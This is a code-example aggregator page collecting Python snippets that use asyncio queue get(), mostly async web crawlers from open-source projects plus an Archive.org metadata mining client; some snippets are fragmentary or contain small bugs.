Python JoinableQueue.get Examples

Programming Language: Python

Namespace/Package Name: asyncio

Class/Type: JoinableQueue

Method/Function: get

Examples at hotexamples.com: 22

Python JoinableQueue.get - 22 examples found. These are the top rated real world Python examples of asyncio.JoinableQueue.get extracted from open source projects. You can rate examples to help us improve the quality of examples.

Frequently Used Methods

Show Hide

get(15)

empty(2)

Example #1

Show file

File: socket_fetch_asyncio.py Project: Tideorz/python_aio_demo

class WebCrawler(object):
    def __init__(self, url, max_requests, loop, max_coroutines=100):
        self.url = url
        self.max_requests = max_requests
        self.links_visited = set()
        self.max_coroutines = max_coroutines
        self.queue = Queue()
        self.loop = loop

    @asyncio.coroutine
    def work(self):
        while True:
            url = yield from self.queue.get()
            fetcher = Fetcher(url, self)
            yield from fetcher.connect()
            self.queue.task_done()

    @asyncio.coroutine
    def web_crawler(self):
        self.queue.put_nowait(self.url)
        self.session = aiohttp.ClientSession(loop=self.loop)
        workers = [
            asyncio.Task(self.work()) for _ in range(self.max_coroutines)
        ]
        yield from self.queue.join()
        for worker in workers:
            worker.cancel()
        yield from self.session.close()

Example #2

Show file

class Fetcher:
    def __init__(self, loop):
        self.num_worker = 10
        self.loop = loop
        self.q = Queue()
        self.seen_urls = set(['/'])

    @asyncio.coroutine
    def manager(self):
        workers = [
            self.loop.create_task(self.worker())
            for _ in range(self.num_worker)
        ]
        yield from self.q.put('/')
        # wait until q is empty
        yield from self.q.join()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def worker(self):
        while True:
            url = yield from self.q.get()

            sock = socket.socket(socket.AF_INET)
            sock.setblocking(False)
            try:
                yield from self.loop.sock_connect(sock, ('dilbert.com', 80))
            except BlockingIOError:
                pass

            request = 'GET {} HTTP/1.1\r\nHost: dilbert.com\r\nConnection: close\r\n\r\n'.format(
                url)
            yield from self.loop.sock_sendall(sock, request.encode('ascii'))

            response = b''
            chunk = yield from self.loop.sock_recv(sock, 4096)
            while chunk:
                response += chunk
                chunk = yield from self.loop.sock_recv(sock, 4096)

            links = yield from self.parse_link(response)
            for link in links.difference(self.seen_urls):
                yield from self.q.put(link)

            self.seen_urls.update(links)
            self.q.task_done()
            sock.close()

    @asyncio.coroutine
    def parse_link(self, response):
        links = set([])
        d = pq(response)
        anchors = d("a")
        for anchor in anchors:
            href = anchor.get("href")
            if href and href[:5] == "http:" and href[7:14] == "dilbert":
                links.add(href[6:])
        return links

Example #3

Show file

File: crawler.py Project: wangwocg/algorithm

class Crawler:
    def __init__(self, root_url, max_redirect):
        self.max_tasks = 10
        self.max_redirect = max_redirect
        self.q = Queue()
        self.seen_urls = set()

        # aiohttp's ClientSession does connection pooling and
        # HTTP keep-alives for us.
        self.session = aiohttp.ClientSession(loop=loop)

        # Put (URL, max_redirect) in the queue.
        self.q.put((root_url, self.max_redirect))
		
	@asyncio.coroutine
    def crawl(self):
        """Run the crawler until all work is done."""
        workers = [asyncio.Task(self.work())
                   for _ in range(self.max_tasks)]

        # When all work is done, exit.
        yield from self.q.join()
        for w in workers:
            w.cancel()
	@asyncio.coroutine
    def work(self):
        while True:
            url, max_redirect = yield from self.q.get()

            # Download page and add new links to self.q.
            yield from self.fetch(url, max_redirect)
            self.q.task_done()
	
	
# Begin fetching http://xkcd.com/353/
fetcher = Fetcher('/353/')
Task(fetcher.fetch())

loop = asyncio.get_event_loop()

crawler = crawling.Crawler('http://xkcd.com',
                           max_redirect=10)

loop.run_until_complete(crawler.crawl())

Example #4

Show file

File: test.py Project: romandev/bible

class Crawler:
    def __init__(self, root_url, max_redirect):
        self.max_tasks = 10
        self.max_redirect = max_redirect
        self.q = Queue()
        self.seen_urls = set()

        self.session = aiohttp.ClientSession(loop=loop)

        self.q.put((root_url, self.max_redirect))

    @asyncio.coroutine
    def crawl(self):
        workers = [asyncio.Task(self.work()) for _ in range(self.max_tasks)]
        yield from self.q.join()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            url, max_direct = yield from self.q.get()
            yield from self.fetch(url, max_redirect)
            self.q.task_done(
            )  # 多线程：https://segmentfault.com/q/1010000009765115

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        response = yield from self.session.get(url, allow_redirects=False)

        try:
            if is_redirect(response):
                if max_redirect > 0:
                    next_url = response.headers['location']
                    if next_url in self.seen_urls:
                        return
                    self.seen_urls.add(next_url)
                    self.q.put_nowait((next_url, max_redirect - 1))
            else:
                links = yield from self.parse_links(response)
                for link in links.differenct(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()

Example #5

Show file

File: scrape.py Project: stelonix/hnewssimulator

def worker(get, queue: asyncio.JoinableQueue, output):
    while True:
        item = yield from queue.get()
        # This is horrible and I feel bad for writing it, believe me
        try:
            if item is None:
                return

            chunks, id = item

            for i in range(id, id + chunks):
                try:
                    data = yield from get("item/{}".format(i))
                    output(data)
                except Exception:
                    pass
        except Exception as e:
            pass
        finally:
            queue.task_done()

Example #6

Show file

File: Spider.py Project: MosaicHe/cl_spider

class Spider:
    def __init__(self, max_tries=30, max_tasks=10, timeout=5,
                 rootDir=os.getcwd()):
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.loop = asyncio.get_event_loop()
        self.q = Queue(loop=self.loop)
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.timeout = timeout
        self.rootDir = rootDir

    def close(self):
        self.session.close()


    def append_request(self, request):
        self.q.put_nowait(request)


    @asyncio.coroutine
    def _get_request(self):
        r = yield from self.q.get()
        return r

    @asyncio.coroutine
    def fetch(self, request_type, url, params, data):
        """Fetch one URL"""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                print("try %s---->%d times"%(url, tries))
                with aiohttp.Timeout(self.timeout):
                    response = yield from self.session.get(url, params=params)
                    if response.status == 200:
                        content_type = response.headers.get('content-type')
                        if content_type in CONTENT_TYPE_TEXT:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.text(encoding='GBK')
                        else:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.read()
                    break;
            except asyncio.TimeoutError:
                print("timeout")
            except aiohttp.ClientError as client_error:
                print("client error")
            except Exception:
                print("unknown error")
            tries += 1
        else:
            print("try %s---->more than %d times, quit"%(url, tries))
            return None

        response.release()
        return content

    @asyncio.coroutine
    def _work(self):
        """Process queue items forever."""
        try:
            while True:
                r = yield from self._get_request()
                content = yield from self.fetch(r.request_type, r.url, r.params, r.data)
                if(content):
                    r.handle_func(content)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def work(self):
        yield from self._work()

    @asyncio.coroutine
    def spider(self):
        """run  the spider until all finished"""
        workers = [asyncio.Task(self.work(),loop=self.loop)
                   for _ in range (self.max_tasks)]
        yield from self.q.join()

        for w in workers:
             w.cancel()

Example #7

Show file

File: crawler.py Project: meodien99/py-crawler

class Crawler:
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, *, loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        self.session.close()

    def host_okay(self, host):
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url,
                            client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        # Process queue items forever.
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        # Add a URL to the queue if not seen before.
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        # Run the crawler until all finished.
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()

Example #8

Show file

class Crawler:
    def __init__(self, roots, exclude=None, strict=True, max_redirect=10, max_tries=4, max_tasks=10, *, loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z]', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        self.session.close()

    def host_okay(self, host):
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                urls = set(re.findall(r"""(?i)href=["']?([^\s"'<>]+)""", text))
                if urls:
                    logger.info('got %r distinct urls from %r', len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stats = FetchStatistic(url=response.url, next_url=None, status=response.status, exception=None, size=len(body),
                               content_type=content_type, encoding=encoding, num_urls=len(links),
                               num_new_urls=len(links - self.seen_urls))
        return stats, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(url, allow_redirects=False)
                if tries > 1:
                    logger.info('try %r for % success', tries, url)
                break
            except aiohttp.ClientError as client_error:
                logger.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1

        else:
            logger.error('%r failed after %r tries', url, self.max_tries)

            self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0,
                                                 content_type=None, encoding=None, num_urls=0, num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(
                    FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0,
                                   content_type=None, encoding=None, num_urls=0, num_new_urls=0))
                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    logger.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    logger.error('redirect limit reached for &r from %r', next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            pass

    @asyncio.coroutine
    def work(self):
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            logger.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            logger.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        if max_redirect is None:
            max_redirect = self.max_redirect
        logger.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    def crawl(self):
        workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()

Example #9

Show file

File: __init__.py Project: MVilstrup/swarm

class Fetcher(object):
    """
    Async Page fetcher, that c 

    """

    def __init__(self, max_tasks=20):
        self.max_tasks = max_tasks
        self.max_redirect = max_redirect
        self.q = Queue()

        # aiohttp's ClientSession does connection pooling and
        # HTTP keep-alives for us.
        loop = asyncio.get_event_loop()
        loop.run_until_complete(self.fetch())
        self.session = aiohttp.ClientSession(loop=loop)


    @asyncio.coroutine
    def fetch(self):
        """
        Run the fetcher until all work is done.
        """
        # Create workers that fetch pages
        workers = [asyncio.Task(self.work())
                   for _ in range(self.max_tasks / 2)]

        # Create seeders that takes URLs from redis and adds it to own queue
        seeders = [asyncio.Task(self.get_seeds())
                   for _ in range(self.max_tasks / 2)]

        # When all work is done, exit.
        yield from self.q.join()
        for s in seeders:
            s.cancel()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            # Get URLs from own queue
            url = yield from self.q.get()

            # Download page
            yield from self.fetch_url(url)
            self.q.task_done()

    @asyncio.coroutine
    def fetch_url(self, url):
        # Handle redirects ourselves.
        response = yield from self.session.get(
            url, allow_redirects=True)

        try:
            # Handle the reponse
            pass
        finally:
            # Return connection to pool.
            yield from response.release()


    @asyncio.coroutine
    def get_seeds(self):
        while True:
            pass

Example #10

Show file

File: crawling.py Project: wmz0001/crawler

class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, *, loop=None):   # The lone * indicates that all following arguments are keyword-only arguments
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):  # \A and \Z are similar to ^ and $, \d represents the digital.(0.0.0.0)
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        """Close resources."""
        self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()

Example #11

Show file

File: core.py Project: pl77/iamine

class Miner(object):

    def __init__(self,
                 loop=None,
                 max_tasks=None,
                 retries=None,
                 secure=None,
                 hosts=None,
                 params=None,
                 config=None,
                 config_file=None,
                 access=None,
                 secret=None,
                 debug=None):

        # Set default values for kwargs.
        loop = asyncio.get_event_loop() if not loop else loop
        max_tasks = 100 if not max_tasks else max_tasks
        max_retries = 10 if not retries else retries
        protocol = 'http://' if not secure else 'https://'
        config = get_config(config, config_file)
        access = config.get('s3', {}).get('access', access)
        secret = config.get('s3', {}).get('secret', secret)
        debug = True if debug else False

        self.max_tasks = max_tasks
        self.max_retries = max_retries
        self.protocol = protocol
        self.hosts = hosts
        self.config = config
        self.access = access
        self.debug = debug
        self.cookies = config.get('cookies', {})

        # Asyncio/Aiohttp settings.
        self.connector = aiohttp.TCPConnector(share_cookies=True, loop=loop)
        self.connector.update_cookies(self.cookies)
        self.loop = loop
        self.q = Queue(1000, loop=self.loop)
        self.q = Queue(loop=self.loop)

        # Require valid access key!
        self.assert_s3_keys_valid(access, secret)

        # Rate limiting.
        self._max_per_second = self.get_global_rate_limit()
        self._min_interval = 1.0 / float(self._max_per_second)
        self._last_time_called = 0.0

    def close(self):
        self.connector.close()
        self.loop.stop()
        self.loop.close()

    def assert_s3_keys_valid(self, access, secret):
        url = '{}s3.us.archive.org?check_auth=1'.format(self.protocol)
        r = urllib.request.Request(url)
        r.add_header('Authorization', 'LOW {0}:{1}'.format(access, secret))
        f = urllib.request.urlopen(r)
        j = json.loads(f.read().decode('utf-8'))
        if j.get('authorized') is not True:
            raise AuthenticationError(j.get('error'))

    def get_global_rate_limit(self):
        """Get the global rate limit per client.

        :rtype: int
        :returns: The global rate limit for each client.
        """
        r = urllib.request.urlopen('https://archive.org/metadata/iamine-rate-limiter')
        j = json.loads(r.read().decode('utf-8'))
        return int(j.get('metadata', {}).get('rate_per_second', 300))

    def _rate_limited():
        """A rate limit decorator for limiting the number of times the
        decorated :class:`Miner` method can be called. Limits are set in
        :attr:`Miner._max_per_second`.
        """
        def decorate(func):
            def rate_limited_func(self, *args, **kwargs):
                elapsed = time.monotonic() - self._last_time_called
                self.left_to_wait = self._min_interval - elapsed
                if self.left_to_wait > 0:
                    time.sleep(self.left_to_wait)
                func(self, *args, **kwargs)
                self._last_time_called = time.monotonic()
                yield from func(self, *args, **kwargs)
            return rate_limited_func
        return decorate

    @_rate_limited()
    def make_rate_limited_request(self, request):
        yield from request.make_request()

    @asyncio.coroutine
    def work(self):
        while True:
            request = yield from self.q.get()
            yield from self.make_rate_limited_request(request)
            self.q.task_done()

    @asyncio.coroutine
    def q_requests(self, requests):
        for req in requests:
            self.q.put_nowait(req)

    @asyncio.coroutine
    def mine(self, requests):
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        yield from self.q_requests(requests)

        yield from self.q.join()
        yield from asyncio.sleep(1)
        while not self.q.empty():
            yield from asyncio.sleep(1)

        for w in workers:
            w.cancel()
        yield from asyncio.sleep(.5)

Example #12

Show file

File: core.py Project: pl77/iamine

class SearchMiner(ItemMiner):

    def __init__(self, **kwargs):
        super(SearchMiner, self).__init__(**kwargs)
        # Item mining queue.
        self.iq = Queue(1000, loop=self.loop)

    def get_search_params(self, query, params):
        default_rows = 500
        search_params = {
            'q': 'all:1',
            'page': 1,
            'output': 'json',
        }
        if params:
            search_params.update({k: v for k, v in params.items() if v})
        if query:
            search_params['q'] = query
        if 'rows' not in search_params:
            search_params['rows'] = default_rows
        return search_params

    def get_search_info(self, params):
        url = make_url('/advancedsearch.php?', self.protocol, self.hosts)
        p = deepcopy(params)
        p['rows'] = 0

        params = urllib.parse.urlencode(p)
        url += params
        f = urllib.request.urlopen(url)
        return json.loads(f.read().decode('utf-8'))

    @asyncio.coroutine
    def _handle_search_results(self, resp, params=None, callback=None):
        j = yield from resp.json(encoding='utf-8')
        resp.close()
        identifiers = []
        for doc in j.get('response', {}).get('docs', []):
            if not doc.get('identifier'):
                continue
            identifiers.append(doc['identifier'])
        for req in metadata_requests(identifiers, params, callback, self):
            self.iq.put_nowait(req)

    def search_requests(self, query=None, params=None, callback=None, mine_ids=None):
        """Mine Archive.org search results.

        :param query: The Archive.org search query to yield results for.
                      Refer to https://archive.org/advancedsearch.php#raw
                      for help formatting your query.
        :type query: str

        :param params: The URL parameters to send with each request sent
                       to the Archive.org Advancedsearch Api.
        :type params: dict
        """
        # If mining ids, devote half the workers to search and half to item mining.
        if mine_ids:
            self.max_tasks = self.max_tasks/2
        # When mining id's, the only field we need returned is "identifier".
        if mine_ids and params:
            params = dict((k, v) for k, v in params.items() if 'fl' not in k)
            params['fl[]'] = 'identifier'

        # Make sure "identifier" is always returned in search results.
        fields = [k for k in params if 'fl' in k]
        if (len(fields) == 1) and (not any('identifier' == params[k] for k in params)):
            # Make sure to not overwrite the existing fl[] key.
            i = 0
            while params.get('fl[{}]'.format(i)):
                i += 1
            params['fl[{}]'.format(i)] = 'identifier'

        search_params = self.get_search_params(query, params)
        url = make_url('/advancedsearch.php', self.protocol, self.hosts)

        search_info = self.get_search_info(search_params)
        total_results = search_info.get('response', {}).get('numFound', 0)
        total_pages = (int(total_results/search_params['rows']) + 1)

        for page in range(1, (total_pages + 1)):
            params = deepcopy(search_params)
            params['page'] = page
            if not callback and mine_ids:
                callback = self._handle_search_results
            req = MineRequest('GET', url, self.access,
                              callback=callback,
                              max_retries=self.max_retries,
                              debug=self.debug,
                              params=params,
                              connector=self.connector)
            yield req

    @asyncio.coroutine
    def mine_items(self):
        while True:
            request = yield from self.iq.get()
            yield from self.make_rate_limited_request(request)
            self.iq.task_done()

    @asyncio.coroutine
    def search(self, query=None, params=None, callback=None, mine_ids=None):
        search_requests = self.search_requests(query, params, callback, mine_ids)
        if mine_ids:
            workers = [asyncio.Task(self.mine_items(), loop=self.loop)
                       for _ in range(self.max_tasks)]

        yield from self.mine(search_requests)
        # Wait a bit for all connections to close.
        yield from asyncio.sleep(1)

        if mine_ids:
            for w in workers:
                w.cancel()

Example #13

Show file

File: crawling.py Project: mtarsel/crawlski

class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, loop=None):

        get_domain(roots)

        if not os.path.exists(os.path.dirname(path)):
            os.makedirs(os.path.dirname(path))

        with open(path, 'w') as temp_file:
            print('writing')
            temp_file.write('Domain name:')
            temp_file.write(roots)
            temp_file.write('\n \n')
